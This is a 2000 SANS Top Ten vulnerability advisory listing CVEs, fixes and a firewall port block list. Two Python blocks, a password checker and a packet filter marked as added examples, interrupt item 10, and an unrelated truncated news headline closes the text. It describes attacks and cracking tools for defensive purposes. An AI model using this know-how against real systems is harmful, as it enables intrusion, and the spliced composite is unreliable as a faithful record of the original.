Note 2. You'll find references to CVE numbers - the Common Vulnerabilities and Exposures reference numbers that correspond with vulnerabilities. CAN numbers are candidates for CVE entries that are not yet fully verified. For more data on the award-winning CVE project, see http://cve.mitre.org.

Note 3. At the end of the list, you'll find an extra section offering a list of the ports used by commonly probed and attacked services. By blocking traffic to those ports at the firewall or other network perimeter protection device, you add an extra layer of defense that helps protect you from configuration mistakes.

1. BIND weaknesses: nxt, qinv and in.named allow immediate root compromise.
The Berkeley Internet Name Domain (BIND) package is the most widely used implementation of Domain Name Service (DNS) -- the critical means by which we all locate systems on the Internet by name (e.g., www.sans.org) without having to know specific IP addresses -- and this makes it a favorite target for attack. Sadly, according to a mid-1999 survey, about 50% of all DNS servers connected to the Internet are running vulnerable versions of BIND. In a typical example of a BIND attack, intruders erased the system logs, and installed tools to gain administrative access. They then compiled and installed IRC utilities and network scanning tools, which they used to scan more than a dozen class-B networks in search of additional systems running vulnerable versions of BIND. In a matter of minutes, they had used the compromised system to attack hundreds of remote systems abroad, resulting in many additional successful compromises. This illustrates the chaos that can result from a single vulnerability in the software for ubiquitous Internet services such as DNS.

Systems Affected: Multiple UNIX and Linux systems
As of May 22, 2000, any version earlier than BIND v.8.2.2 patch level 5 is vulnerable.

CVE Entries:
nxt CVE-1999-0833
qinv CVE-1999-0009
Other related entries: CVE-1999-0835, CVE-1999-0848, CVE-1999-0849, CVE-1999-0851

Advice on correcting the problem:

A. Disable the BIND name daemon (named) on all systems that are not authorized to be DNS servers. Some experts recommend you also remove the DNS software.

B. On machines that are authorized DNS servers, update to the latest version and patch level (as of May 22, 2000, the latest version was 8.2.2 patch level 5). Use the guidance contained in the following advisories:
For the NXT vulnerability: http://www.cert.org/advisories/CA-99-14-bind.html
For the QINV (Inverse Query) and NAMED vulnerabilities:
http://www.cert.org/advisories/CA-98.05.bind_problems.html
http://www.cert.org/summaries/CS-98.04.html

C. Run BIND as a non-privileged user for protection in the event of future remote-compromise attacks. (However, only processes running as root can be configured to use ports below 1024, a requirement for DNS. Therefore you must configure BIND to change the user-id after binding to the port.)

D. Run BIND in a chroot()ed directory structure for protection in the event of future remote-compromise attacks.

2. Vulnerable CGI programs and application extensions (e.g., ColdFusion) installed on web servers.

Most web servers support Common Gateway Interface (CGI) programs to provide interactivity in web pages, such as data collection and verification. Many web servers come with sample CGI programs installed by default. Unfortunately, many CGI programmers fail to consider ways in which their programs may be misused or subverted to execute malicious commands. Vulnerable CGI programs present a particularly attractive target to intruders because they are relatively easy to locate, and they operate with the privileges and power of the web server software itself. Intruders are known to have exploited vulnerable CGI programs to vandalize web pages, steal credit card information, and set up back doors to enable future intrusions, even if the CGI programs are secured. When Janet Reno's picture was replaced by that of Adolph Hitler at the Department of Justice web site, an in-depth assessment concluded that a CGI hole was the most probable avenue of compromise. Allaire's ColdFusion is a web server application package which includes vulnerable sample programs when installed. As a general rule, sample programs should always be removed from production systems.

Systems Affected: All web servers.

CVE Entries:
** Sample CGI programs (All CGI)
Remedy: Remove all sample CGI programs on a production server.
** CAN-1999-0736 (IIS 4.0, Microsoft Site Server 3.0, which is included with Microsoft Site Server 3.0 Commerce Edition, Microsoft Commercial Internet System 2.0, and Microsoft BackOffice Server 4.0 and 4.5) (see http://www.microsoft.com/technet/security/bulletin/ms99-013.asp )
Remedy: Apply patch at: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
CVE-1999-0067 (phf phone book program included with older NCSA and Apache server)
CVE-1999-0068 ('mylog.html' sample script shipped with the PHP/FI)
CVE-1999-0270 (IRIX 6.2, IRIX 6.3, IRIX 6.4)
CVE-1999-0346 (sample script shipped with the PHP/FI package)
CVE-2000-0207 (IRIX 6.5)

Most important CGI Vulnerabilities not including sample programs
CAN-1999-0467 (WebCom Guestbook CGI)
** CAN-1999-0509 (All CGI Web Servers)
Refer to http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html
Remedy: The solution to this problem is to ensure that the CGI bin directory does not include any general-purpose interpreters, for example PERL, Tcl, UNIX shells (sh, csh, ksh, etc.)
CVE-1999-0021 (Muhammad A. Muquit's wwwcount version 2.3)
CVE-1999-0039 (Outbox Environment Subsystem for IRIX)
CVE-1999-0058 (PHP/FI package written by Rasmus Lerdorf)
CVE-1999-0147 (Glimpse HTTP 2.0 and WebGlimpse)
CVE-1999-0148 (Outbox Environment Subsystem for IRIX)
CVE-1999-0149 (Outbox Environment Subsystem for IRIX)
** CVE-1999-0174 (All CGI Web Servers)
Refer to http://xforce.iss.net/static/291.php (More info at http://www.netspace.org/cgi-bin/wa?A2=ind9702B&L=bugtraq&P=R64 )
Remedy: Remove the "view-source" script from the cgi-bin directory on your web server.
CVE-1999-0177 (O'Reilly Website 2.0 and earlier CGI)
CVE-1999-0178 (O'Reilly Website 2.0 and earlier CGI)
CVE-1999-0237 (Webcom's CGI Guestbook for Win32 web servers)
CVE-1999-0262 (fax survey CGI script on Linux)
CVE-1999-0279 (Excite for Web Servers)
CVE-1999-0771 (Compaq Management Agents and the Compaq Survey Utility)
CVE-1999-0951 (OmniHTTPd CGI program)
CVE-2000-0012 (MS SQL CGI program)
CVE-2000-0039 (AltaVista search engine)
CVE-2000-0208 (htsearch CGI script for ht://dig)

ColdFusion Sample Program Vulnerabilities
** CAN-1999-0455
** CAN-1999-0922
** CAN-1999-0923

ColdFusion Other Vulnerability
** CAN-1999-0760
** CVE-2000-0057

Advice on correcting the problem:

A. Do not run web servers as root.

B. Get rid of CGI script interpreters in bin directories:
http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html

C. Remove unsafe CGI scripts:
http://www.cert.org/advisories/CA-97.07.nph-test-cgi_script.html
http://www.cert.org/advisories/CA-96.06.cgi_example_code.html
http://www.cert.org/advisories/CA-97.12.webdist.html

D. Write safer CGI programs:
http://www-4.ibm.com/software/developer/library/secure-cgi/
http://www.cert.org/tech_tips/cgi_metacharacters.html
http://www.cert.org/advisories/CA-97.24.Count_cgi.html

E. Don't configure CGI support on Web servers that don't need it.

F. Run your Web server in a chroot()ed environment to protect the machine against yet-to-be-discovered exploits.

3. Remote Procedure Call (RPC) weaknesses in rpc.ttdbserverd (ToolTalk), rpc.cmsd (Calendar Manager), and rpc.statd that allow immediate root compromise

Remote procedure calls (RPC) allow programs on one computer to execute programs on a second computer. They are widely used to access network services such as shared files in NFS. Multiple vulnerabilities caused by flaws in RPC are being actively exploited.
There is compelling evidence that the vast majority of the distributed denial of service attacks launched during 1999 and early 2000 were executed by systems that had been victimized because they had the RPC vulnerabilities. The broadly successful attack on U.S. military systems during the Solar Sunrise incident also exploited an RPC flaw found on hundreds of Department of Defense systems.

Systems Affected: Multiple UNIX and Linux systems

CVE Entries:
rpc.ttdbserverd - CVE-1999-0687, CVE-1999-0003, CVE-1999-0693 (-0687 is newer than -0003, but both allow root from remote attackers and it's likely that -0003 is still around a LOT; -0693 is only locally exploitable, but does give root)
rpc.cmsd - CVE-1999-0696
rpc.statd - CVE-1999-0018, CVE-1999-0019.

Advice on correcting the problem:

A. Wherever possible, turn off and/or remove these services on machines directly accessible from the Internet.

B. Where you must run them, install the latest patches:
For Solaris Software Patches: http://sunsolve.sun.com
For IBM AIX Software:
http://techsupport.services.ibm.com/support/rs6000.support/downloads
http://techsupport.services.ibm.com/rs6k/fixes.html
For SGI Software Patches: http://support.sgi.com/
For Compaq (Digital Unix) Patches: http://www.compaq.com/support

Search the vendor patch database for tooltalk patches and install them right away. A summary document pointing to specific guidance about each of the three principal RPC vulnerabilities may be found at:
http://www.cert.org/incident_notes/IN-99-04.html
For statd: http://www.cert.org/advisories/CA-99-05-statd-automountd.html
For ToolTalk: http://www.cert.org/advisories/CA-98.11.tooltalk.html
For Calendar Manager: http://www.cert.org/advisories/CA-99-08-cmsd.html

4. RDS security hole in the Microsoft Internet Information Server (IIS)

Microsoft's Internet Information Server (IIS) is the web server software found on most web sites deployed on Microsoft Windows NT and Windows 2000 servers.
Programming flaws in IIS's Remote Data Services (RDS) are being employed by malicious users to run remote commands with administrator privileges. Some participants who developed the "Top Ten" list believe that exploits of other IIS flaws, such as .HTR files, are at least as common as exploits of RDS. Prudence dictates that organizations using IIS install patches or upgrades to correct all known IIS security flaws when they install patches or upgrades to fix the RDS flaw.

Systems Affected: Microsoft Windows NT systems using Internet Information Server

CVE Entries: CVE-1999-1011

Advice on correcting the problem:

A. An outstanding guide to the RDS weakness and how to correct it may be found at:
http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2

B. Microsoft has also posted relevant information at:
http://support.microsoft.com/support/kb/articles/q184/3/75.asp
http://www.microsoft.com/technet/security/bulletin/ms98-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp

5. Sendmail buffer overflow weaknesses, pipe attacks and MIMEbo, that allow immediate root compromise.

Sendmail is the program that sends, receives, and forwards most electronic mail processed on UNIX and Linux computers. Sendmail's widespread use on the Internet makes it a prime target of attackers. Several flaws have been found over the years. The very first advisory issued by CERT/CC in 1988 made reference to an exploitable weakness in sendmail. In one of the most common exploits, the attacker sends a crafted mail message to the machine running Sendmail, and Sendmail reads the message as instructions requiring the victim machine to send its password file to the attacker's machine (or to another victim) where the passwords can be cracked.

Systems Affected: Multiple UNIX and Linux systems

CVE Entries: CVE-1999-0047, CVE-1999-0130, CVE-1999-0131, CVE-1999-0203, CVE-1999-0204, CVE-1999-0206. CVE-1999-0130 is locally exploitable only.

Advice on correcting the problem:

A. Upgrade to the latest version of Sendmail and/or implement patches for sendmail. See http://www.cert.org/advisories/CA-97.05.sendmail.html

B. Do not run Sendmail in daemon mode (turn off the -bd switch) on machines that are neither mail servers nor mail relays.

6. sadmind and mountd

Sadmind allows remote administration access to Solaris systems, providing graphical access to system administration functions. Mountd controls and arbitrates access to NFS mounts on UNIX hosts. Buffer overflows in these applications can be exploited allowing attackers to gain control with root access.

Systems Affected: Multiple UNIX and Linux systems (Sadmind: Solaris machines only)

CVE Entries:
sadmind - CVE-1999-0977
mountd - CVE-1999-0002.

Advice on correcting the problem:

A. Wherever possible, turn off and/or remove these services on machines directly accessible from the Internet.

B. Install the latest patches:
For Solaris Software Patches: http://sunsolve.sun.com
For IBM AIX Software:
http://techsupport.services.ibm.com/support/rs6000.support/downloads
http://techsupport.services.ibm.com/rs6k/fixes.html
For SGI Software Patches: http://support.sgi.com/
For Compaq (Digital Unix) Patches: http://www.compaq.com/support

C. More guidance at:
http://www.cert.org/advisories/CA-99-16-sadmind.html
http://www.cert.org/advisories/CA-98.12.mountd.html

7. Global file sharing and inappropriate information sharing via NetBIOS and Windows NT ports 135->139 (445 in Windows2000), or UNIX NFS exports on port 2049, or Macintosh Web sharing or AppleShare/IP on ports 80, 427, and 548.

These services allow file sharing over networks. When improperly configured, they can expose critical system files or give full file system access to any hostile party connected to the network. Many computer owners and administrators use these services to make their file systems readable and writeable in an effort to improve the convenience of data access.
Administrators of a government computer site used for software development for mission planning made their files world readable so people at a different government facility could get easy access. Within two days, other people had discovered the open file shares and stolen the mission planning software.

When file sharing is enabled on Windows machines they become vulnerable to both information theft and certain types of quick-moving viruses. A recently released virus called the 911 Worm uses file shares on Windows 95 and 98 systems to propagate and causes the victim's computer to dial 911 on its modem. Macintosh computers are also vulnerable to file sharing exploits.

The same NetBIOS mechanisms that permit Windows File Sharing may also be used to enumerate sensitive system information from NT systems. User and Group information (usernames, last logon dates, password policy, RAS information), system information, and certain Registry keys may be accessed via a "null session" connection to the NetBIOS Session Service. This information is typically used to mount a password guessing or brute force password attack against the NT target.

Systems Affected: UNIX, Windows, and Macintosh systems.

CVE Entries:
  SMB shares with poor access control - CAN-1999-0520
  NFS exports to the world - CAN-1999-0554
  These candidate entries are likely to change significantly before being accepted as full CVE entries.

Advice on correcting the problem:

A. When sharing mounted drives, ensure only required directories are shared.

B. For added security, allow sharing only to specific IP addresses because DNS names can be spoofed.

C. For Windows systems, ensure all shares are protected with strong passwords.

D. For Windows NT systems, prevent anonymous enumeration of users, groups, system configuration and registry keys via the "null session" connection. Block inbound connections to the NetBIOS Session Service (tcp 139) at the router or the NT host. Consider implementing the RestrictAnonymous registry key for Internet-connected hosts in standalone or non-trusted domain environments:
   NT4: http://support.microsoft.com/support/kb/articles/Q143/4/74.asp
   Win2000: http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP

E. A quick, free, and secure test for the presence of NetBIOS file sharing, and its related vulnerabilities, effective for machines running ANY operating system, is available at the Gibson Research Corporation web site. Simply visit http://grc.com/ and click the "ShieldsUP" icon to receive a real-time appraisal of any system's NetBIOS exposure. Detailed instructions are available to help Microsoft Windows users deal with NetBIOS vulnerabilities.

F. For Macintosh systems, disable file sharing and web sharing extensions unless absolutely required. If file sharing must be enabled, ensure strong passwords for access, and stop file sharing during periods in which it is not required.
   To permanently disable Web sharing in MacOS 8 or MacOS 9, remove two files and restart:
     System Folder:Control Panels:Web Sharing
     System Folder:Extensions:Web Sharing Extension
   To permanently disable AppleShare/IP in MacOS 9, remove one file and restart:
     System Folder:Extensions:Shareway IP Personal Bgnd

8. User IDs, especially root/administrator with no passwords or weak passwords.

Some systems come with "demo" or "guest" accounts with no passwords or with widely-known default passwords. Service workers often leave maintenance accounts with no passwords, and some database management systems install administration accounts with default passwords. In addition, busy system administrators often select system passwords that are easily guessable ("love," "money," "wizard" are common) or just use a blank password. Default passwords provide effortless access for attackers. Many attackers try default passwords and then try to guess passwords before resorting to more sophisticated methods.
Compromised user accounts get the attackers inside the firewall and inside the target machine. Once inside, most attackers can use widely-accessible exploits to gain root or administrator access.

Systems Affected: All systems.

CVE Entries:
  Unix guessable (weak) password - CAN-1999-0501
  Unix default or blank password - CAN-1999-0502
  NT guessable (weak) password - CAN-1999-0503
  NT default or blank password - CAN-1999-0504
  These candidate entries are likely to change significantly before being accepted as full CVE entries.

Advice on correcting the problem:

A. Create an acceptable password policy including assigned responsibility and frequency for verifying password quality. Ensure senior executives are not exempted. Also include in the policy a requirement to change all default passwords before attaching computers to the Internet, with substantial penalties for non-compliance.

B1. VERY IMPORTANT! Obtain written authority to test passwords.

B2. Test passwords with password cracking programs:
   For Windows NT: l0phtcrack, http://www.l0pht.com
   For UNIX: Crack, http://www.users.dircon.co.uk/~crypto

C. Implement utilities that check passwords when created.
   For UNIX: Npasswd, http://www.utexas.edu/cc/unix/software/npasswd
   For Windows NT: http://support.microsoft.com/support/kb/articles/Q161/9/90.asp

D. Force passwords to expire periodically (at a frequency established in your security policy).

E. Maintain password histories so users cannot recycle old passwords.

Additional information may be found at:
   http://www.cert.org/tech_tips/passwd_file_protection.html
   http://www.cert.org/incident_notes/IN-98.03.html
   http://www.cert.org/incident_notes/IN-98.01.irix.html

9. IMAP and POP buffer overflow vulnerabilities or incorrect configuration.

IMAP and POP are popular remote access mail protocols, allowing users to access their e-mail accounts from internal and external networks.
The "open access" nature of these services makes them especially vulnerable to exploitation because openings are frequently left in firewalls to allow for external e-mail access. Attackers who exploit flaws in IMAP or POP often gain instant root-level control.

Systems Affected: Multiple UNIX and Linux systems

CVE Entries: CVE-1999-0005, CVE-1999-0006, CVE-1999-0042, CVE-1999-0920, CVE-2000-0091

Advice on correcting the problem:

A. Disable these services on machines that are not e-mail servers.

B. Use the latest patches and versions. Additional information may be found at:
   http://www.cert.org/advisories/CA-98.09.imapd.html
   http://www.cert.org/advisories/CA-98.08.qpopper_vul.html
   http://www.cert.org/advisories/CA-97.09.imap_pop.html

C. Some of the experts also recommend controlling access to these services using TCP wrappers and encrypted channels such as SSH and SSL to protect passwords.

10. Default SNMP community strings set to 'public' and 'private.'

The Simple Network Management Protocol (SNMP) is widely used by network administrators to monitor and administer all types of network-connected devices ranging from routers to printers to computers. SNMP uses an unencrypted "community string" as its only authentication mechanism. Lack of encryption is bad enough, but the default community string used by the vast majority of SNMP devices is "public", with a few "clever" network equipment vendors changing the string to "private". Attackers can use this vulnerability in SNMP to reconfigure or shut down devices remotely. Sniffed SNMP traffic can reveal a great deal about the structure of your network, as well as the systems and devices attached to it. Intruders use such information to pick targets and plan attacks.

Systems Affected: All system and network devices.
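Items 8 and 10 come down to the same control: a creation-time check that refuses blank, default and guessable values, keeps a history so old values cannot be recycled, and enforces expiry, applied to user passwords and SNMP community names alike. The following is an added example of such a check in Python; it is not code from SANS or from the tools the list names (npasswd, l0phtcrack, snmpwalk), and its word lists, minimum length, maximum age and history depth are constructed assumptions.

```python
"""Creation-time credential check, an added example for items 8 and 10 of the
Top Ten list (not code from SANS or from the tools the list names). One policy
serves both user passwords and SNMP community names: blank or default values,
dictionary words and obvious mutations, short or single-class strings, strings
containing the principal's name, reuse of a recent credential, and expiry.
"""
import hashlib
import os
import re
from datetime import date, timedelta

# Constructed lists: the page names "love", "money", "wizard", "public" and
# "private"; a real deployment loads far larger word and default lists.
DEFAULTS = {"", "public", "private", "guest", "demo", "admin", "password"}
DICTIONARY = {"love", "money", "wizard", "secret", "welcome", "letmein"}
LEET = str.maketrans("4310$5@", "aeiossa")  # 4->a 3->e 1->i 0->o $->s 5->s @->a

MIN_LENGTH = 8                 # policy numbers are assumptions for the example
MAX_AGE = timedelta(days=90)
HISTORY_DEPTH = 6
PBKDF2_ROUNDS = 50_000


def mutations(secret):
    """Forms a guessing tool would also try: lower-cased, leading/trailing
    digits and punctuation stripped, leet-decoded, reversed."""
    s = secret.lower()
    stripped = re.sub(r"^[^a-z]+|[^a-z]+$", "", s)
    forms = set()
    for base in (s, stripped):
        forms |= {base, base.translate(LEET), base[::-1]}
    return forms


def _digest(secret, salt):
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, PBKDF2_ROUNDS)


def _as_date(d):
    """Accept a date, an ISO string such as '2000-06-01', or None (today)."""
    if d is None:
        return date.today()
    return date.fromisoformat(d) if isinstance(d, str) else d


class CredentialPolicy:
    """Per-principal history and change dates; a principal is a user name for
    a password or a device name for an SNMP community string."""

    def __init__(self):
        self.history = {}   # principal -> [(salt, digest), ...], newest first
        self.changed = {}   # principal -> date of last change

    def check(self, principal, secret):
        """Return the list of policy violations (empty means acceptable)."""
        problems = []
        if secret in DEFAULTS:
            problems.append("blank or default value")
        if len(secret) < MIN_LENGTH:
            problems.append(f"shorter than {MIN_LENGTH} characters")
        if mutations(secret) & DICTIONARY:
            problems.append("dictionary word or simple mutation of one")
        if principal.lower() in secret.lower():
            problems.append("contains the account or device name")
        classes = sum(bool(re.search(p, secret))
                      for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
        if classes < 3:
            problems.append("fewer than three character classes")
        for salt, digest in self.history.get(principal, []):
            if _digest(secret, salt) == digest:
                problems.append(f"reused within the last {HISTORY_DEPTH} changes")
                break
        return problems

    def set(self, principal, secret, today=None):
        """Apply check(); on success record a salted hash and the change date."""
        problems = self.check(principal, secret)
        if problems:
            return problems
        salt = os.urandom(16)
        hist = self.history.setdefault(principal, [])
        hist.insert(0, (salt, _digest(secret, salt)))
        del hist[HISTORY_DEPTH:]          # keep only the last HISTORY_DEPTH
        self.changed[principal] = _as_date(today)
        return []

    def expired(self, principal, today=None):
        """True when the credential is older than MAX_AGE or was never set."""
        last = self.changed.get(principal)
        return last is None or _as_date(today) - last > MAX_AGE


if __name__ == "__main__":
    policy = CredentialPolicy()
    # Constructed sample: one user account and one router community string.
    for who, what in (("alice", "L0ve2000!"), ("core-rtr", "private"),
                      ("alice", "Vt-7kQp#2mZ")):
        print(who, repr(what), policy.set(who, what, "2000-06-01") or "accepted")
    print("alice expired on 2000-09-15:", policy.expired("alice", "2000-09-15"))
```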
CVE Entries:
  default or blank SNMP community name (public) - CAN-1999-0517
  guessable SNMP community name - CAN-1999-0516
  hidden SNMP community strings - CAN-1999-0254, CAN-1999-0186
  These candidate entries are likely to change significantly before being accepted as full CVE entries.

Advice on correcting the problem:

A. If you do not absolutely require SNMP, disable it.

B. If you are using SNMP, use the same policy for community names as used for passwords described in Vulnerability Cluster Number 8 above.

C. Validate and check community names using snmpwalk.

D. Where possible make MIBs read only.

Additional information: http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315

A High Priority Bonus Item for Windows Users and Administrators: Various Scripting Holes in Internet Explorer and Office 2000

Recent virus attacks have illustrated how macro and script code could spread easily through e-mail attachments, and people were admonished to avoid opening potentially dangerous attachments. However, Windows users can also spread malicious viruses without opening attachments. Microsoft Outlook and Outlook Express will execute HTML and script code in an e-mail in their default installations. In addition, several so-called ActiveX components are incorrectly executable from an e-mail containing HTML and script code. Some of the vulnerable controls include the Scriptlet.typelib (ships with IE 4.x and 5.x) and the UA control (Office 2000). Other vulnerabilities arising from the use of Active Scripting are that an e-mail could be used to install new software on a user's computer. A relatively benign virus known as the kak worm is already spreading through these mechanisms. A malicious version of kak can be anticipated at any time.

We recommend that all users and administrators set Outlook and Outlook Express to read e-mail in the "Restricted Sites Zone" and then further disable all Active Scripting and ActiveX related settings in that zone.
This is done in the Options dialog's Security tab, but can be automated using System Policies. Microsoft has made patches available for the individual problems and is readying a patch which will set the security settings in Outlook, but apparently has no plans on fixing Outlook Express.

Systems Affected: All Windows systems with Internet Explorer 4.x and 5.x (even if it is not used) or Office 2000. Windows 2000 is not affected by some of the IE issues.

CVE Entries: CVE-1999-0668, CAN-2000-0329

Advice on correcting the problem:
   http://www.microsoft.com/security/bulletins/ms99-032.asp
   http://www.microsoft.com/security/bulletins/MS99-048.asp
   http://www.microsoft.com/technet/security/bulletin/MS00-034.asp

The fixes for the particular vulnerabilities discussed here are available from:
   http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm
   http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm
   http://officeupdate.microsoft.com/info/ocx.htm

Set your Security Zone to restricted sites and then disable all active content in that zone. Apply the patch to Outlook as soon as it becomes available at:
   http://www.officeupdate.com/2000/articles/out2ksecarticle.htm

Updating your virus detection software, while important, is not a complete solution for this problem. You must also correct the flaws in Microsoft's software.

Perimeter Protection For An Added Layer of Defense In Depth

In this section, we list ports that are commonly probed and attacked. Blocking these ports is a minimum requirement for perimeter security, not a comprehensive firewall specification list. A far better rule is to block all unused ports. And even if you believe these ports are blocked, you should still actively monitor them to detect intrusion attempts.

A warning is also in order. Blocking some of the ports in the following list may disable needed services. Please consider the potential effects of these recommendations before implementing them.
Block "spoofed" addresses -- packets coming from outside your company sourced from internal addresses or private (RFC1918 and network 127) addresses. Also block source routed packets.

Login services -- telnet (23/tcp), SSH (22/tcp), FTP (21/tcp), NetBIOS (139/tcp), rlogin et al (512/tcp through 514/tcp)

RPC and NFS -- Portmap/rpcbind (111/tcp and 111/udp), NFS (2049/tcp and 2049/udp), lockd (4045/tcp and 4045/udp)

NetBIOS in Windows NT -- 135 (tcp and udp), 137 (udp), 138 (udp), 139 (tcp). Windows 2000: the earlier ports plus 445 (tcp and udp)

X Windows -- 6000/tcp through 6255/tcp

Naming services -- DNS (53/udp) to all machines which are not DNS servers, DNS zone transfers (53/tcp) except from external secondaries, LDAP (389/tcp and 389/udp)

Mail -- SMTP (25/tcp) to all machines which are not external mail relays, POP (109/tcp and 110/tcp), IMAP (143/tcp)

Web -- HTTP (80/tcp) and SSL (443/tcp) except to external Web servers; may also want to block common high-order HTTP port choices (8000/tcp, 8080/tcp, 8888/tcp, etc.)

"Small Services" -- ports below 20/tcp and 20/udp, time (37/tcp and 37/udp)

Miscellaneous -- TFTP (69/udp), finger (79/tcp), NNTP (119/tcp), NTP (123/tcp), LPD (515/tcp), syslog (514/udp), SNMP (161/tcp and 161/udp, 162/tcp and 162/udp), BGP (179/tcp), SOCKS (1080/tcp)

ICMP -- block incoming echo request (ping and Windows traceroute), block outgoing echo replies, time exceeded, and destination unreachable messages except "packet too big" messages (type 3, code 4). (This item assumes that you are willing to forego the legitimate uses of ICMP echo request in order to block some known malicious uses.)
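The list above is a policy rather than a configuration, and the easy mistake is to push it to a router and only then discover which "except ..." clauses were dropped. As an added example (not SANS code), here the list is transcribed as data and evaluated packet by packet in Python, so a proposed filter can be exercised against sample traffic first; the site profile (internal prefix, DNS servers, mail relays, web servers, external secondaries) and the packets are constructed on RFC 5737 documentation addresses.

```python
"""Perimeter filter for the block list above, an added example (not SANS code).
The list is transcribed as a small rule language, parsed into
(proto, low port, high port, name, exemption) tuples and evaluated packet by
packet; clauses like "except to external mail relays" are looked up in a
per-site profile of host addresses, which is a constructed assumption here.
"""
from ipaddress import ip_address, ip_network
from typing import NamedTuple


class Packet(NamedTuple):
    direction: str           # "in" = arriving from the Internet, "out" = leaving
    proto: str               # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: int = 0
    icmp_type: int = -1
    icmp_code: int = -1
    source_routed: bool = False


# RFC1918 space plus network 127: never legitimate as an inbound source.
PRIVATE = [ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# One line per entry of the list: "name: proto ports [!side:key]; ..." where
# "!dst:key" or "!src:key" exempts the hosts stored under key in the profile.
BLOCK_SPEC = """
login services: tcp 21-23 512-514
rpc and nfs: tcp 111 2049 4045; udp 111 2049 4045
netbios: tcp 135 139 445; udp 135 137 138 445
x windows: tcp 6000-6255
dns: udp 53 !dst:dns_servers
dns zone transfer: tcp 53 !src:external_secondaries
ldap: tcp 389; udp 389
smtp: tcp 25 !dst:mail_relays
pop and imap: tcp 109 110 143
web: tcp 80 443 !dst:web_servers
alternate http: tcp 8000 8080 8888
small services: tcp 0-19; udp 0-19
time: tcp 37; udp 37
misc: udp 69 514; tcp 79 119 123 515 179 1080
snmp: tcp 161 162; udp 161 162
"""


def parse_rules(spec):
    rules = []
    for line in spec.strip().splitlines():
        name, _, body = line.partition(":")
        for segment in body.split(";"):
            tokens = segment.split()
            proto, exempt, ports = tokens[0], None, []
            for tok in tokens[1:]:
                if tok.startswith("!"):
                    exempt = tok[1:]
                else:
                    lo, _, hi = tok.partition("-")
                    ports.append((int(lo), int(hi or lo)))
            rules.extend((proto, lo, hi, name.strip(), exempt) for lo, hi in ports)
    return rules


RULES = parse_rules(BLOCK_SPEC)


def make_site(internal, **hosts):
    """Site profile: internal prefixes plus the named host sets exemptions use."""
    site = {"internal": [ip_network(n) for n in internal]}
    site.update({key: set(addrs) for key, addrs in hosts.items()})
    return site


def decide(pkt, site):
    """Return ("block", reason) or ("allow", None) for one packet."""
    if pkt.source_routed:
        return "block", "source routed packet"
    if pkt.direction == "out":
        # Outbound: only the ICMP leakage rules; type 3 code 4 must pass (PMTU).
        if pkt.proto == "icmp" and pkt.icmp_type in (0, 3, 11):
            if (pkt.icmp_type, pkt.icmp_code) == (3, 4):
                return "allow", None
            return "block", f"outbound icmp type {pkt.icmp_type}"
        return "allow", None
    src = ip_address(pkt.src)
    if any(src in net for net in PRIVATE + site["internal"]):
        return "block", f"spoofed source {pkt.src}"
    if pkt.proto == "icmp":
        return ("block", "inbound echo request") if pkt.icmp_type == 8 else ("allow", None)
    for proto, lo, hi, name, exempt in RULES:
        if proto == pkt.proto and lo <= pkt.dport <= hi:
            if exempt:
                side, key = exempt.split(":")
                if (pkt.dst if side == "dst" else pkt.src) in site.get(key, set()):
                    continue     # covered by an "except ..." clause of the list
            return "block", name
    return "allow", None


if __name__ == "__main__":
    # Constructed site profile and packet on RFC 5737 documentation addresses.
    site = make_site(["203.0.113.0/24"], dns_servers={"203.0.113.10"},
                     mail_relays={"203.0.113.25"}, web_servers={"203.0.113.80"})
    pkt = Packet("in", "tcp", "198.51.100.7", "203.0.113.5", dport=139)
    print(pkt, decide(pkt, site))
```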
Signatories:
  Randy Marchany, Virginia Tech
  Scott Conti, University of Massachusetts
  Matt Bishop, University of California, Davis
  Sten Drescher, Tivoli Systems
  Lance Spitzner, Sun Microsystems GESS Security Team
  Alan Paller, SANS Institute
  Stephen Northcutt, SANS Institute
  Eric Cole, SANS Institute
  Gene Spafford, Purdue University CERIAS
  Jim Ransome, Pilot Network Services
  Frank Swift, Pilot Network Services
  Jim Magdych, Network Associates, Inc.
  Jimmy Kuo, Network Associates, Inc.
  Igor Gashinsky, NetSec, Inc.
  Greg Shipley, Neohapsis
  Tony Sager, National Security Agency
  Larry Merritt, National Security Agency
  Bill Hill, MITRE
  Steve Christey, MITRE
  Viriya Upatising, Loxley Information Services Co.
  Marcus Sachs, JTF-CND, US Department of Defense
  Billy Austin, Intrusion.com
  Christopher W. Klaus, Internet Security Systems
  Wayne Stenson, Honeywell
  Martin Roesch, Hiverworld, Inc.
  Jeff Stutzman, Healthcare ISAC
  Ed Skoudis, Global Integrity
  Gene Schultz, Global Integrity
  Kelly Cooper, Genuity
  Eric Schultze, Foundstone
  Bill Hancock, Exodus Communications
  Ron Nguyen, Ernst & Young
  Lee Brotzman, NASIRC, Allied Technology Group, Inc.
  Scott Lawler, DoD Cert
  Hal Pomeranz, Deer Run Associates
  Chris Brenton, Dartmouth Institute for Security Studies
  Bruce Schneier, Counterpane Internet Security, Inc.
  Nick FitzGerald, Computer Virus Consulting Ltd.
  Shawn Hernan, CERT Coordination Center
  Kathy Fithen, CERT Coordination Center
  Derek Simmel, Carnegie Mellon University
  Jesper Johansson, Boston University
  Dave Mann, BindView
  Rob Clyde, Axent
  David Nolan, Arch Paging
  Mudge, @stake

The following is a list of people who have helped make this document better through their contributions:
  Robert Harris

© 2000 SANS Institute : Office 301.951.0102 : Registration 719.599.4303 : Web Contact scott@sans.org

@HWA

258.0 [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AP: New w0rld Media
Exclusive to the Norton Rambler
Tony Crosslink reports.

